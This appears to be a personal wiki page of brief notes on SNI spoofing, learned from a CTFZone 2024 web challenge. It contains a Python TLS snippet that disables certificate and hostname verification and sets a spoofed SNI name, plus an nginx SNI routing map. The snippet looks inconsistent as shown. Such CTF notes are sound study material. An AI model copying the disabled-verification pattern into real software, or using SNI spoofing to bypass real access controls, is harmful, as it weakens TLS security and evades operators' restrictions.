osorin's abyss

User Tools

Site Tools

Trace: sni-spoof
sni-spoof

This is an old revision of the document!

Lessons learned from CTFZone CTF 2024: [WEB] youtube-unlock 

context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
ssl_sock = context.wrap_socket(conn, server_side=True, server_hostname='www.spoofed-sni.com')

Relevant nginx.conf block: 

    map $ssl_preread_server_name $proxy {
        youtube.com              backend;
        www.youtube.com          backend;
        default                  backend_default;
    }

Useful sources:

https://www.cloudflare.com/learning/ssl/what-is-sni/

https://medium.com/@hirushaadi/tcp-over-ssl-tunnel-with-sni-spoofing-analysis-da7f267bad56

sni-spoof.1724246392.txt.gz · Last modified: 2024/08/21 13:19 by osorin